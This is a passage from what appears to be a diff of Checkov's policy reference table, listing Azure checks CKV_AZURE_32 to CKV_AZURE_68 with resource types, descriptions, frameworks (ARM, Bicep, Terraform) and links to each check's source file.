[PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 1659 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 1660 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 1661 | CKV_AZURE_33 | 
resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | arm | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | +| 1662 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Bicep | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | +| 1663 | CKV_AZURE_33 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Terraform | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py) | +| 1664 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 1665 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 1666 | CKV_AZURE_34 | resource | azurerm_storage_container | Ensure that 'Public access level' is set to Private for blob containers | Terraform | 
[StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py) | +| 1667 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 1668 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 1669 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 1670 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 1671 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | arm | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py) | +| 1672 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | Bicep | 
[StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | +| 1673 | CKV_AZURE_35 | resource | azurerm_storage_account | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | +| 1674 | CKV_AZURE_35 | resource | azurerm_storage_account_network_rules | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | +| 1675 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | arm | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountAzureServicesAccessEnabled.py) | +| 1676 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Bicep | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | +| 1677 | CKV_AZURE_36 | resource | azurerm_storage_account | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | +| 1678 | CKV_AZURE_36 | resource | azurerm_storage_account_network_rules | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | 
[StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | +| 1679 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | arm | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | +| 1680 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | Bicep | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | +| 1681 | CKV_AZURE_37 | resource | azurerm_monitor_log_profile | Ensure that Activity Log Retention is set 365 days or greater | Terraform | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileRetentionDays.py) | +| 1682 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | arm | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | +| 1683 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | Bicep | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | +| 1684 | CKV_AZURE_38 | resource | azurerm_monitor_log_profile | Ensure audit profile captures all the activities | Terraform | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileCategories.py) | +| 1685 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom 
subscription owner roles are created | arm | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | +| 1686 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | Bicep | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | +| 1687 | CKV_AZURE_39 | resource | azurerm_role_definition | Ensure that no custom subscription owner roles are created | Terraform | [CutsomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CutsomRoleDefinitionSubscriptionOwner.py) | +| 1688 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | arm | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | +| 1689 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | Bicep | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | +| 1690 | CKV_AZURE_40 | resource | azurerm_key_vault_key | Ensure that the expiration date is set on all keys | Terraform | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyExpirationDate.py) | +| 1691 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | arm | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | +| 1692 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | 
Bicep | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | +| 1693 | CKV_AZURE_41 | resource | azurerm_key_vault_secret | Ensure that the expiration date is set on all secrets | Terraform | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretExpirationDate.py) | +| 1694 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | arm | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | +| 1695 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | Bicep | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | +| 1696 | CKV_AZURE_42 | resource | azurerm_key_vault | Ensure the key vault is recoverable | Terraform | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyvaultRecoveryEnabled.py) | +| 1697 | CKV_AZURE_43 | resource | azurerm_storage_account | Ensure Storage Accounts adhere to the naming rules | Terraform | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountName.py) | +| 1698 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | arm | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | +| 1699 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | Bicep | 
[StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | +| 1700 | CKV_AZURE_44 | resource | azurerm_storage_account | Ensure Storage Account is using the latest version of TLS encryption | Terraform | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py) | +| 1701 | CKV_AZURE_45 | resource | azurerm_virtual_machine | Ensure that no sensitive credentials are exposed in VM custom_data | Terraform | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py) | +| 1702 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | arm | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | +| 1703 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Bicep | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | +| 1704 | CKV_AZURE_47 | resource | azurerm_mariadb_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Terraform | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBSSLEnforcementEnabled.py) | +| 1705 | CKV_AZURE_48 | resource | azurerm_mariadb_server | Ensure 'public network access enabled' is set to 'False' for MariaDB servers | Terraform | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py) | +| 1706 | CKV_AZURE_49 | resource | 
Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | arm | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | +| 1707 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | +| 1708 | CKV_AZURE_49 | resource | azurerm_linux_virtual_machine_scale_set | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureScaleSetPassword.py) | +| 1709 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | arm | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | +| 1710 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | Bicep | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | +| 1711 | CKV_AZURE_50 | resource | azurerm_linux_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | +| 1712 | CKV_AZURE_50 | resource | azurerm_windows_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | 
[AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | +| 1713 | CKV_AZURE_52 | resource | Microsoft.Sql/servers | Ensure MSSQL is using the latest version of TLS encryption | arm | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py) | +| 1714 | CKV_AZURE_52 | resource | Microsoft.Sql/servers | Ensure MSSQL is using the latest version of TLS encryption | Bicep | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py) | +| 1715 | CKV_AZURE_52 | resource | azurerm_mssql_server | Ensure MSSQL is using the latest version of TLS encryption | Terraform | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py) | +| 1716 | CKV_AZURE_53 | resource | Microsoft.DBforMySQL/servers | Ensure 'public network access enabled' is set to 'False' for mySQL servers | arm | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py) | +| 1717 | CKV_AZURE_53 | resource | Microsoft.DBforMySQL/servers | Ensure 'public network access enabled' is set to 'False' for mySQL servers | Bicep | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py) | +| 1718 | CKV_AZURE_53 | resource | azurerm_mysql_server | Ensure 'public network access enabled' is set to 'False' for mySQL servers | Terraform | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py) | +| 1719 | CKV_AZURE_54 | resource | Microsoft.DBforMySQL/servers | Ensure MySQL is using the latest version of TLS encryption | arm | 
[MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py) | +| 1720 | CKV_AZURE_54 | resource | Microsoft.DBforMySQL/servers | Ensure MySQL is using the latest version of TLS encryption | Bicep | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py) | +| 1721 | CKV_AZURE_54 | resource | azurerm_mysql_server | Ensure MySQL is using the latest version of TLS encryption | Terraform | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py) | +| 1722 | CKV_AZURE_55 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Servers | Terraform | [AzureDefenderOnServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py) | +| 1723 | CKV_AZURE_56 | resource | Microsoft.Web/sites/config | Ensure that function apps enables Authentication | arm | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py) | +| 1724 | CKV_AZURE_56 | resource | Microsoft.Web/sites/config | Ensure that function apps enables Authentication | Bicep | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py) | +| 1725 | CKV_AZURE_56 | resource | azurerm_function_app | Ensure that function apps enables Authentication | Terraform | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py) | +| 1726 | CKV_AZURE_57 | resource | Microsoft.Web/sites | Ensure that CORS disallows every resource to access app services | arm | 
[AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDisallowCORS.py) | +| 1727 | CKV_AZURE_57 | resource | Microsoft.Web/sites | Ensure that CORS disallows every resource to access app services | Bicep | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDisallowCORS.py) | +| 1728 | CKV_AZURE_57 | resource | azurerm_app_service | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | +| 1729 | CKV_AZURE_57 | resource | azurerm_linux_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | +| 1730 | CKV_AZURE_57 | resource | azurerm_windows_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | +| 1731 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | arm | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | +| 1732 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | Bicep | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | +| 1733 | CKV_AZURE_58 | resource | azurerm_synapse_workspace | Ensure that Azure 
Synapse workspaces enables managed virtual networks | Terraform | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | +| 1734 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | arm | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | +| 1735 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | Bicep | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | +| 1736 | CKV_AZURE_59 | resource | azurerm_storage_account | Ensure that Storage accounts disallow public access | Terraform | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py) | +| 1737 | CKV_AZURE_61 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for App Service | Terraform | [AzureDefenderOnAppServices.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py) | +| 1738 | CKV_AZURE_62 | resource | Microsoft.Web/sites | Ensure function apps are not accessible from all regions | arm | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppDisallowCORS.py) | +| 1739 | CKV_AZURE_62 | resource | Microsoft.Web/sites | Ensure function apps are not accessible from all regions | Bicep | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppDisallowCORS.py) | +| 1740 | CKV_AZURE_62 | resource 
| azurerm_function_app | Ensure function apps are not accessible from all regions | Terraform | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py) | +| 1741 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | arm | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | +| 1742 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | Bicep | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | +| 1743 | CKV_AZURE_63 | resource | azurerm_app_service | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | +| 1744 | CKV_AZURE_63 | resource | azurerm_linux_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | +| 1745 | CKV_AZURE_63 | resource | azurerm_windows_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | +| 1746 | CKV_AZURE_64 | resource | Microsoft.StorageSync/storageSyncServices | Ensure that Azure File Sync disables public network access | arm | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py) | +| 1747 | CKV_AZURE_64 | resource | Microsoft.StorageSync/storageSyncServices | Ensure 
that Azure File Sync disables public network access | Bicep | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py) | +| 1748 | CKV_AZURE_64 | resource | azurerm_storage_sync | Ensure that Azure File Sync disables public network access | Terraform | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py) | +| 1749 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | arm | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | +| 1750 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | Bicep | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | +| 1751 | CKV_AZURE_65 | resource | azurerm_app_service | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | +| 1752 | CKV_AZURE_65 | resource | azurerm_linux_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | +| 1753 | CKV_AZURE_65 | resource | azurerm_windows_web_app | Ensure that App service enables detailed error messages | Terraform | 
[AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | +| 1754 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | arm | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | +| 1755 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | Bicep | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | +| 1756 | CKV_AZURE_66 | resource | azurerm_app_service | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | +| 1757 | CKV_AZURE_66 | resource | azurerm_linux_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | +| 1758 | CKV_AZURE_66 | resource | azurerm_windows_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | +| 1759 | CKV_AZURE_67 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest, if used to run the Function app | arm | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) | +| 1760 | CKV_AZURE_67 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest, if used 
to run the Function app | Bicep | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) | +| 1761 | CKV_AZURE_67 | resource | Microsoft.Web/sites/slots | Ensure that 'HTTP Version' is the latest, if used to run the Function app | arm | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) | +| 1762 | CKV_AZURE_67 | resource | Microsoft.Web/sites/slots | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Bicep | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) | +| 1763 | CKV_AZURE_67 | resource | azurerm_function_app | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | +| 1764 | CKV_AZURE_67 | resource | azurerm_function_app_slot | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | +| 1765 | CKV_AZURE_68 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server disables public network access | Terraform | 